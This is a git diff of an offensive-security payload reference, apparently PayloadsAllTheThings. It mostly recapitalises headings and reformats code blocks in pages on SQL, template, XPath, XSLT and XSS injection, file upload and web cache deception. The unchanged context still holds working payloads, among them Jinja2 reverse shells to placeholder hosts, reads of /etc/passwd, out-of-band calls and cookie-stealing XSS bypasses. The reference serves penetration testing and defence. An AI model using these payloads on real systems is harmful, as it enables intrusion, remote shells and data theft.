diff --git a/SQL Injection/Cassandra Injection.md b/SQL Injection/Cassandra Injection.md index 1a3f9eb..dc8036e 100644 --- a/SQL Injection/Cassandra Injection.md +++ b/SQL Injection/Cassandra Injection.md @@ -6,8 +6,8 @@ ## Summary * [CQL Injection Limitations](#cql-injection-limitations) -* [Cassandra comment](#cassandra-comment) -* [Cassandra - Login Bypass](#cassandra---login-bypass) +* [Cassandra Comment](#cassandra-comment) +* [Cassandra Login Bypass](#cassandra-login-bypass) * [Example #1](#example-1) * [Example #2](#example-2) * [References](#references) @@ -26,14 +26,14 @@ * CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected. -## Cassandra comment +## Cassandra Comment ```sql /* Cassandra Comment */ ``` -## Cassandra - Login Bypass +## Cassandra Login Bypass ### Example #1 diff --git a/SQL Injection/DB2 Injection.md b/SQL Injection/DB2 Injection.md index abcf578..0523a4f 100644 --- a/SQL Injection/DB2 Injection.md +++ b/SQL Injection/DB2 Injection.md @@ -54,7 +54,6 @@ ## DB2 Methodology - | Description | SQL Query | | ---------------- | ------------------------------------ | | List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` | diff --git a/Server Side Template Injection/ASP.md b/Server Side Template Injection/ASP.md index 96d76f0..c7173df 100644 --- a/Server Side Template Injection/ASP.md +++ b/Server Side Template Injection/ASP.md @@ -6,8 +6,8 @@ ## Summary - [ASP.NET Razor](#aspnet-razor) - - [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection) - - [ASP.NET Razor - Command execution](#aspnet-razor---command-execution) + - [ASP.NET Razor - Basic Injection](#aspnet-razor---basic-injection) + - [ASP.NET Razor - Command Execution](#aspnet-razor---command-execution) - [References](#references) @@ -18,13 +18,13 @@ > Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages. -### ASP.NET Razor - Basic injection +### ASP.NET Razor - Basic Injection ```powershell @(1+2) ``` -### ASP.NET Razor - Command execution +### ASP.NET Razor - Command Execution ```csharp @{ diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index 38ea280..e53f393 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -8,13 +8,13 @@ - [Templating Libraries](#templating-libraries) - [Smarty](#smarty) - [Twig](#twig) - - [Twig - Basic injection](#twig---basic-injection) - - [Twig - Template format](#twig---template-format) + - [Twig - Basic Injection](#twig---basic-injection) + - [Twig - Template Format](#twig---template-format) - [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading) - - [Twig - Code execution](#twig---code-execution) + - [Twig - Code Execution](#twig---code-execution) - [Latte](#latte) - - [Latte - Basic injection](#latte---basic-injection) - - [Latte - Code execution](#latte---code-execution) + - [Latte - Basic Injection](#latte---basic-injection) + - [Latte - Code Execution](#latte---code-execution) - [patTemplate](#pattemplate) - [PHPlib](#phplib-and-html_template_phplib) - [Plates](#plates) @@ -53,7 +53,7 @@ [Official website](https://twig.symfony.com/) > Twig is a modern template engine for PHP. -### Twig - Basic injection +### Twig - Basic Injection ```python {{7*7}} @@ -63,7 +63,7 @@ {{app.request.server.all|join(',')}} ``` -### Twig - Template format +### Twig - Template Format ```python $output = $twig > render ( @@ -84,7 +84,7 @@ $output = $twig > render ( {{include("wp-config.php")}} ``` -### Twig - Code execution +### Twig - Code Execution ```python {{self}} @@ -118,13 +118,13 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld ## Latte -### Latte - Basic injection +### Latte - Basic Injection ```php {var $X="POC"}{$X} ``` -### Latte - Code execution +### Latte - Code Execution ```php {php system('nslookup oastify.com')} diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index a5b91b5..e3b57f8 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -7,29 +7,29 @@ - [Templating Libraries](#templating-libraries) - [Django](#django) - - [Django - Basic injection](#django---basic-injection) - - [Django - Cross-site scripting](#django---cross-site-scripting) - - [Django - Debug information leak](#django---debug-information-leak) - - [Django - Leaking app's Secret Key](#django---leaking-apps-secret-key) + - [Django - Basic Injection](#django---basic-injection) + - [Django - Cross-Site Scripting](#django---cross-site-scripting) + - [Django - Debug Information Leak](#django---debug-information-leak) + - [Django - Leaking App's Secret Key](#django---leaking-apps-secret-key) - [Django - Admin Site URL leak](#django---admin-site-url-leak) - - [Django - Admin username and password hash leak](#django---admin-username-and-password-hash-leak) + - [Django - Admin Username and Password Hash Leak](#django---admin-username-and-password-hash-leak) - [Jinja2](#jinja2) - - [Jinja2 - Basic injection](#jinja2---basic-injection) - - [Jinja2 - Template format](#jinja2---template-format) + - [Jinja2 - Basic Injection](#jinja2---basic-injection) + - [Jinja2 - Template Format](#jinja2---template-format) - [Jinja2 - Debug Statement](#jinja2---debug-statement) - - [Jinja2 - Dump all used classes](#jinja2---dump-all-used-classes) - - [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables) - - [Jinja2 - Read remote file](#jinja2---read-remote-file) - - [Jinja2 - Write into remote file](#jinja2---write-into-remote-file) + - [Jinja2 - Dump All Used Classes](#jinja2---dump-all-used-classes) + - [Jinja2 - Dump All Config Variables](#jinja2---dump-all-config-variables) + - [Jinja2 - Read Remote File](#jinja2---read-remote-file) + - [Jinja2 - Write Into Remote File](#jinja2---write-into-remote-file) - [Jinja2 - Remote Command Execution](#jinja2---remote-command-execution) - - [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce) - - [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread) - - [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen) - - [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) - - [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file) - - [Jinja2 - Filter bypass](#jinja2---filter-bypass) + - [Forcing Output On Blind RCE](#jinja2---forcing-output-on-blind-rce) + - [Exploit The SSTI By Calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread) + - [Exploit The SSTI By Calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen) + - [Exploit The SSTI By Calling Popen Without Guessing The Offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) + - [Exploit The SSTI By Writing an Evil Config File](#exploit-the-ssti-by-writing-an-evil-config-file) + - [Jinja2 - Filter Bypass](#jinja2---filter-bypass) - [Tornado](#tornado) - - [Tornado - Basic injection](#tornado---basic-injection) + - [Tornado - Basic Injection](#tornado---basic-injection) - [Tornado - Remote Command Execution](#tornado---remote-command-execution) - [Mako](#mako) - [Mako - Remote Command Execution](#mako---remote-command-execution) @@ -54,7 +54,7 @@ Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2. -### Django - Basic injection +### Django - Basic Injection ```python {% csrf_token %} # Causes error with Jinja2 @@ -63,20 +63,20 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r ``` -### Django - Cross-site scripting +### Django - Cross-Site Scripting ```python {{ '' }} {{ '' | safe }} ``` -### Django - Debug information leak +### Django - Debug Information Leak ```python {% debug %} ``` -### Django - Leaking app’s Secret Key +### Django - Leaking App's Secret Key ```python {{ messages.storages.0.signer.key }} @@ -89,7 +89,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r {% include 'admin/base.html' %} ``` -### Django - Admin username and password hash leak +### Django - Admin Username And Password Hash Leak ``` @@ -104,7 +104,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r [Official website](https://jinja.palletsprojects.com/) > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. -### Jinja2 - Basic injection +### Jinja2 - Basic Injection ```python {{4*4}}[[5*5]] @@ -115,7 +115,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r Jinja2 is used by Python Web Frameworks such as Django or Flask. The above injections have been tested on a Flask application. -### Jinja2 - Template format +### Jinja2 - Template Format ```python {% extends "layout.html" %} @@ -139,7 +139,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement -### Jinja2 - Dump all used classes +### Jinja2 - Dump All Used Classes ```python {{ [].class.base.subclasses() }} @@ -153,7 +153,7 @@ Access `__globals__` and `__builtins__`: {{ self.__init__.__globals__.__builtins__ }} ``` -### Jinja2 - Dump all config variables +### Jinja2 - Dump All Config Variables ```python {% for key, value in config.iteritems() %} @@ -162,7 +162,7 @@ Access `__globals__` and `__builtins__`: {% endfor %} ``` -### Jinja2 - Read remote file +### Jinja2 - Read Remote File ```python # ''.__class__.__mro__[2].__subclasses__()[40] = File class @@ -172,7 +172,7 @@ Access `__globals__` and `__builtins__`: {{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }} ``` -### Jinja2 - Write into remote file +### Jinja2 - Write Into Remote File ```python {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} @@ -186,7 +186,7 @@ Listen for connection nc -lnvp 8000 ``` -#### Jinja2 - Forcing output on blind RCE +#### Jinja2 - Forcing Output On Blind RCE You can import Flask functions to return an output from the vulnerable page. @@ -203,7 +203,7 @@ def hook(*args, **kwargs): ``` -#### Exploit the SSTI by calling os.popen().read() +#### Exploit The SSTI By Calling os.popen().read() ```python {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }} @@ -235,7 +235,7 @@ With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a pa Source: https://twitter.com/podalirius_/status/1655970628648697860 -#### Exploit the SSTI by calling subprocess.Popen +#### Exploit The SSTI By Calling subprocess.Popen :warning: the number 396 will vary depending of the application. @@ -244,7 +244,7 @@ Source: https://twitter.com/podalirius_/status/1655970628648697860 {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} ``` -#### Exploit the SSTI by calling Popen without guessing the offset +#### Exploit The SSTI By Calling Popen Without Guessing The Offset ```python {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} @@ -257,7 +257,7 @@ In another GET parameter include a variable named "input" that contains the comm {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} ``` -#### Exploit the SSTI by writing an evil config file. +#### Exploit The SSTI By Writing An Evil Config File ```python # evil config @@ -270,7 +270,7 @@ In another GET parameter include a variable named "input" that contains the comm {{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} ``` -### Jinja2 - Filter bypass +### Jinja2 - Filter Bypass ```python request.__class__ @@ -313,7 +313,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http ## Tornado -### Tornado - Basic injection +### Tornado - Basic Injection ```py {{7*7}} diff --git a/Type Juggling/README.md b/Type Juggling/README.md index 97abf16..4789183 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -6,8 +6,8 @@ ## Summary * [Loose Comparison](#loose-comparison) - * [True statements](#true-statements) - * [NULL statements](#null-statements) + * [True Statements](#true-statements) + * [NULL Statements](#null-statements) * [Loose Comparison](#loose-comparison) * [Magic Hashes](#magic-hashes) * [Methodology](#methodology) @@ -22,7 +22,7 @@ - **Loose** comparison: using `== or !=` : both variables have "the same value". - **Strict** comparison: using `=== or !==` : both variables have "the same type and the same value". -### True statements +### True Statements | Statement | Output | | --------------------------------- |:---------------:| @@ -44,7 +44,7 @@ ![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true) -Loose Type Comparisons occurs in many languages: +Loose Type comparisons occurs in many languages: * [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb) * [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql) @@ -56,7 +56,7 @@ Loose Type Comparisons occurs in many languages: * [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0) -### NULL statements +### NULL Statements | Function | Statement | Output | | -------- | -------------------------- |:---------------:| diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 40fe403..95b0ffe 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -7,10 +7,10 @@ * [Tools](#tools) * [Methodology](#methodology) - * [Defaults extensions](#defaults-extensions) - * [Upload tricks](#upload-tricks) - * [Filename vulnerabilities](#filename-vulnerabilities) - * [Picture compression](#picture-compression) + * [Defaults Extensions](#defaults-extensions) + * [Upload Tricks](#upload-tricks) + * [Filename Vulnerabilities](#filename-vulnerabilities) + * [Picture Compression](#picture-compression) * [Picture Metadata](#picture-metadata) * [Configuration Files](#configuration-files) * [CVE - ImageMagick](#cve---imagemagick) @@ -30,7 +30,7 @@ ![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true) -### Defaults extensions +### Defaults Extensions * PHP Server ```powershell @@ -64,7 +64,7 @@ * Coldfusion: `.cfm, .cfml, .cfc, .dbm` * Node.js: `.js, .json, .node` -### Upload tricks +### Upload Tricks - Use double extensions : `.jpg.php, .png.php5` - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg` @@ -99,7 +99,7 @@ * Shell can also be added in the metadata - Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "`file.asax:.jpg`"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "`file.asp::$data.`") -### Filename vulnerabilities +### Filename Vulnerabilities Sometimes the vulnerability is not the upload but how the file is handled after. You might want to upload files with payloads in the filename. diff --git a/Web Cache Deception/README.md b/Web Cache Deception/README.md index 8908523..f6d40ce 100644 --- a/Web Cache Deception/README.md +++ b/Web Cache Deception/README.md @@ -33,6 +33,7 @@ Imagine an attacker lures a logged-in victim into accessing `http://www.example. 6. The cache server identifies that the file has a CSS extension. 7. Under the cache directory, the cache server creates a directory named home.php and caches the imposter "CSS" file (non-existent.css) inside it. 8. When the attacker requests `http://www.example.com/home.php/non-existent.css`, the request is sent to the cache server, and the cache server returns the cached file with the victim's sensitive `home.php` data. + ![WCD Demonstration](Images/wcd.jpg) @@ -88,9 +89,9 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page The following URL format are a good starting point to check for "cache" feature. -* https://example.com/app/conversation/.js?test -* https://example.com/app/conversation/;.js -* https://example.com/home.php/non-existent.css +* `https://example.com/app/conversation/.js?test` +* `https://example.com/app/conversation/;.js` +* `https://example.com/home.php/non-existent.css` ## CloudFlare Caching diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index 706678f..57388b2 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -7,7 +7,7 @@ * [Tools](#tools) * [Methodology](#methodology) - * [Blind exploitation](#blind-exploitation) + * [Blind Exploitation](#blind-exploitation) * [Out Of Band Exploitation](#out-of-band-exploitation) * [Labs](#labs) * [References](#references) @@ -23,7 +23,11 @@ ## Methodology -Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"` +Similar to SQL injection, you want to terminate the query properly: + +```ps1 +string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var1+ "']/account/text()) +``` ```sql ' or '1'='1 @@ -39,9 +43,9 @@ x' or name()='username' or 'x'='y ' and count(/*)=1 and '1'='1 ' and count(/@*)=1 and '1'='1 ' and count(/comment())=1 and '1'='1 -search=')] | //user/*[contains(*,' -search=Har') and contains(../password,'c -search=Har') and starts-with(../password,'c +')] | //user/*[contains(*,' +') and contains(../password,'c +') and starts-with(../password,'c ``` ### Blind Exploitation @@ -50,7 +54,8 @@ search=Har') and starts-with(../password,'c ```sql and string-length(account)=SIZE_INT ``` -2. Extract a character + +2. Access a character with `substring`, and verify its value the `codepoints-to-string` function ```sql substring(//user[userid=5]/username,2,1)=CHAR_HERE substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) diff --git a/XSLT Injection/README.md b/XSLT Injection/README.md index 25f6b5a..b2b39fe 100644 --- a/XSLT Injection/README.md +++ b/XSLT Injection/README.md @@ -7,11 +7,11 @@ - [Tools](#tools) - [Methodology](#methodology) - - [Determine the vendor and version](#determine-the-vendor-and-version) + - [Determine the Vendor And Version](#determine-the-vendor-and-version) - [External Entity](#external-entity) - - [Read files and SSRF using document](#read-files-and-ssrf-using-document) - - [Write files with EXSLT extension](#write-files-with-exslt-extension) - - [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper) + - [Read Files and SSRF Using Document](#read-files-and-ssrf-using-document) + - [Write Files with EXSLT Extension](#write-files-with-exslt-extension) + - [Remote Code Execution with PHP Wrapper](#remote-code-execution-with-php-wrapper) - [Remote Code Execution with Java](#remote-code-execution-with-java) - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net) - [Labs](#labs) @@ -22,12 +22,10 @@ No known tools currently exist to assist with XSLT exploitation. -* [TODO](#) - ## Methodology -### Determine the vendor and version +### Determine the Vendor and Version ```xml @@ -51,6 +49,8 @@ No known tools currently exist to assist with XSLT exploitation. ### External Entity +Don't forget to test for XXE when you encounter XSLT files. + ```xml ]> @@ -66,7 +66,7 @@ No known tools currently exist to assist with XSLT exploitation. ``` -### Read files and SSRF using document +### Read Files and SSRF Using Document ```xml @@ -86,7 +86,7 @@ No known tools currently exist to assist with XSLT exploitation. ``` -### Write files with EXSLT extension +### Write Files with EXSLT Extension EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. @@ -106,7 +106,7 @@ EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions ``` -### Remote Code Execution with PHP wrapper +### Remote Code Execution with PHP Wrapper Execute the function `readfile`. diff --git a/XSS Injection/1 - XSS Filter Bypass.md b/XSS Injection/1 - XSS Filter Bypass.md index c12a961..03d73a1 100644 --- a/XSS Injection/1 - XSS Filter Bypass.md +++ b/XSS Injection/1 - XSS Filter Bypass.md @@ -2,28 +2,29 @@ ## Summary -- [Bypass case sensitive](#bypass-case-sensitive) -- [Bypass tag blacklist](#bypass-tag-blacklist) -- [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation) -- [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag) -- [Bypass quotes for string](#bypass-quotes-for-string) -- [Bypass quotes in script tag](#bypass-quotes-in-script-tag) -- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event) -- [Bypass dot filter](#bypass-dot-filter) -- [Bypass parenthesis for string](#bypass-parenthesis-for-string) -- [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon) -- [Bypass onxxxx= blacklist](#bypass-onxxxx-blacklist) -- [Bypass space filter](#bypass-space-filter) -- [Bypass email filter](#bypass-email-filter) -- [Bypass document blacklist](#bypass-document-blacklist) -- [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist) -- [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) -- [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect) -- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) -- [Bypass ">" using nothing](#bypass--using-nothing) +- [Bypass Case Sensitive](#bypass-case-sensitive) +- [Bypass Tag Blacklist](#bypass-tag-blacklist) +- [Bypass Word Blacklist with Code Evaluation](#bypass-word-blacklist-with-code-evaluation) +- [Bypass with Incomplete HTML Tag](#bypass-with-incomplete-html-tag) +- [Bypass Quotes for String](#bypass-quotes-for-string) +- [Bypass Quotes in Script Tag](#bypass-quotes-in-script-tag) +- [Bypass Quotes in Mousedown Event](#bypass-quotes-in-mousedown-event) +- [Bypass Dot Filter](#bypass-dot-filter) +- [Bypass Parenthesis for String](#bypass-parenthesis-for-string) +- [Bypass Parenthesis and Semi Colon](#bypass-parenthesis-and-semi-colon) +- [Bypass onxxxx= Blacklist](#bypass-onxxxx-blacklist) +- [Bypass Space Filter](#bypass-space-filter) +- [Bypass Email Filter](#bypass-email-filter) +- [Bypass Tel URI Filter](#bypass-tel-uri-filter) +- [Bypass document Blacklist](#bypass-document-blacklist) +- [Bypass document.cookie Blacklist](#bypass-document-cookie-blacklist) +- [Bypass using Javascript Inside a String](#bypass-using-javascript-inside-a-string) +- [Bypass using an Alternate Way to Redirect](#bypass-using-an-alternate-way-to-redirect) +- [Bypass using an Alternate Way to Execute an Alert](#bypass-using-an-alternate-way-to-execute-an-alert) +- [Bypass ">" using Nothing](#bypass--using-nothing) - [Bypass "<" and ">" using < and >](#bypass--and--using--and-) -- [Bypass ";" using another character](#bypass--using-another-character) -- [Bypass using missing charset header](#bypass-using-missing-charset-header) +- [Bypass ";" using Another Character](#bypass--using-another-character) +- [Bypass using Missing Charset Header](#bypass-using-missing-charset-header) - [Bypass using HTML encoding](#bypass-using-html-encoding) - [Bypass using Katakana](#bypass-using-katakana) - [Bypass using Cuneiform](#bypass-using-cuneiform) @@ -36,11 +37,11 @@ - [Bypass using UTF-16be](#bypass-using-utf-16be) - [Bypass using UTF-32](#bypass-using-utf-32) - [Bypass using BOM](#bypass-using-bom) -- [Bypass using jsfuck](#bypass-using-jsfuck) +- [Bypass using JSfuck](#bypass-using-jsfuck) - [References](#references) -## Bypass case sensitive +## Bypass Case Sensitive To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercase letters within the tags or function names. @@ -52,14 +53,14 @@ To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercas Since many XSS filters only recognize exact lowercase or uppercase patterns, this can sometimes evade detection by tricking simple case-sensitive filters. -## Bypass tag blacklist +## Bypass Tag Blacklist ```javascript @@ -96,7 +97,7 @@ http://localhost/bla.php?test= ``` -## Bypass quotes in mousedown event +## Bypass Quotes in Mousedown Event You can bypass a single quote with ' in an on mousedown event handler @@ -104,7 +105,7 @@ You can bypass a single quote with ' in an on mousedown event handler Link ``` -## Bypass dot filter +## Bypass Dot Filter ```javascript @@ -119,60 +120,74 @@ http://www.geektools.com/cgi-bin/ipconv.cgi Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==` -## Bypass parenthesis for string +## Bypass Parenthesis for String ```javascript alert`1` setTimeout`alert\u0028document.domain\u0029`; ``` -## Bypass parenthesis and semi colon +## Bypass Parenthesis and Semi Colon -```javascript -// From @garethheyes - - - +* From @garethheyes + ```javascript + + + + ``` -// From @terjanq - +* From @terjanq + ```js + + ``` -// From @cgvwzq - -``` +* From @cgvwzq + ```js + + ``` -## Bypass onxxxx= blacklist +## Bypass onxxxx Blacklist -```javascript - - +* Use less known tag + ```html + + + ``` -// Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed - - - - +* Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed + ```html + + + + + ``` -// Bypass onxxx= filter with a '/' - -``` +* Bypass onxxx= filter with a '/' + ```js + + ``` -## Bypass space filter -```javascript -// Bypass space filter with "/" - +## Bypass Space Filter -// Bypass space filter with 0x0c/^L or 0x0d/^M or 0x0a/^J or 0x09/^I - +* Bypass space filter with "/" + ```javascript + + ``` +* Bypass space filter with `0x0c/^L` or `0x0d/^M` or `0x0a/^J` or `0x09/^I` + ```html + + ``` + +```ps1 $ echo "" | xxd 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c . ``` -## Bypass email filter +## Bypass Email Filter * [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate) ```javascript @@ -185,7 +200,7 @@ $ echo "" | xxd ``` -## Bypass tel URI filter +## Bypass Tel URI Filter At least 2 RFC mention the `;phone-context=` descriptor: @@ -197,22 +212,22 @@ At least 2 RFC mention the `;phone-context=` descriptor: ``` -## Bypass document blacklist +## Bypass Document Blacklist ```javascript
window["doc"+"ument"] ``` -## Bypass document.cookie blacklist +## Bypass document.cookie Blacklist This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. -``` +```js window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);}); ``` -## Bypass using javascript inside a string +## Bypass using Javascript Inside a String ```javascript "; ``` -## Bypass using an alternate way to redirect +## Bypass using an Alternate Way to Redirect ```javascript location="http://google.com" @@ -230,7 +245,7 @@ window.location.assign("http://google.com") window['location']['href']="http://google.com" ``` -## Bypass using an alternate way to execute an alert +## Bypass using an Alternate Way to Execute an Alert From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet. @@ -271,14 +286,15 @@ self[Object.keys(self)[5]]("1") // alert("1") We can find "alert" with a regular expression like ^a[rel]+t$ : ```javascript -a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a() +//bind function alert on new function a() +a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} // then you can use a() with Object.keys - self[Object.keys(self)[a()]]("1") // alert("1") ``` Oneliner: + ```javascript a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1") ``` @@ -339,9 +355,9 @@ XSSObject.proxy = function (obj, name, report_function_name, exec_original) { XSSObject.proxy(window, 'alert', 'window.alert', false); ``` -## Bypass ">" using nothing +## Bypass ">" using Nothing -You don't need to close your tags. +There is no need to close the tags, the browser will try to fix it. ```javascript \x3csVg/\x3e diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 70c0992..ea9cbcd 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -12,24 +12,23 @@ - [UI Redressing](#ui-redressing) - [Javascript Keylogger](#javascript-keylogger) - [Other Ways](#other-ways) -- [Identify an XSS endpoint](#identify-an-xss-endpoint) +- [Identify an XSS Endpoint](#identify-an-xss-endpoint) - [Tools](#tools) - [XSS in HTML/Applications](#xss-in-htmlapplications) - [Common Payloads](#common-payloads) - [XSS using HTML5 tags](#xss-using-html5-tags) - - [XSS using a remote JS](#xss-using-a-remote-js) - - [XSS in hidden input](#xss-in-hidden-input) - - [XSS when payload is reflected capitalized](#xss-when-payload-is-reflected-capitalized) - - [DOM based XSS](#dom-based-xss) + - [XSS using a Remote JS](#xss-using-a-remote-js) + - [XSS in Hidden Input](#xss-in-hidden-input) + - [XSS in Uppercase Output](#xss-in-uppercase-output) + - [DOM Based XSS](#dom-based-xss) - [XSS in JS Context](#xss-in-js-context) - [XSS in Wrappers for URI](#xss-in-wrappers-for-uri) - [Wrapper javascript:](#wrapper-javascript) - [Wrapper data:](#wrapper-data) - [Wrapper vbscript:](#wrapper-vbscript) -- [XSS in files](#xss-in-files) +- [XSS in Files](#xss-in-files) - [XSS in XML](#xss-in-xml) - [XSS in SVG](#xss-in-svg) - - [XSS in SVG (short)](#xss-in-svg-short) - [XSS in Markdown](#xss-in-markdown) - [XSS in CSS](#xss-in-css) - [XSS in PostMessage](#xss-in-postmessage) @@ -128,7 +127,7 @@ More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all] - [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html) -## Identify an XSS endpoint +## Identify an XSS Endpoint This payload opens the debugger in the developer console rather than triggering a popup alert box. @@ -251,7 +250,7 @@ Most tools are also suitable for blind XSS attacks: e.g: 14.rs/#alert(document.domain) ``` -### XSS in hidden input +### XSS in Hidden Input ```javascript ``` -### DOM based XSS +### DOM Based XSS Based on a DOM XSS sink. @@ -329,7 +328,7 @@ only IE vbscript:msgbox("XSS") ``` -## XSS in files +## XSS in Files **NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup. @@ -389,7 +388,7 @@ More comprehensive payload with svg tag attribute, desc script, foreignObject sc -### XSS in SVG (short) +#### Short SVG Payload ```javascript @@ -399,7 +398,7 @@ More comprehensive payload with svg tag attribute, desc script, foreignObject sc </title><script>alert(3)</script> ``` -### XSS in SVG (nesting) +### Nesting SVG and XSS Including a remote SVG image in a SVG works but won't trigger the XSS embedded in the remote SVG. Author: noraj. @@ -500,6 +499,7 @@ document.getElementById('btn').onclick = function(e){ XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app). You can set up an alternative version + * Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express) * Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/) @@ -511,9 +511,9 @@ You can set up an alternative version ### Other Blind XSS tools -- [sleepy-puppy - 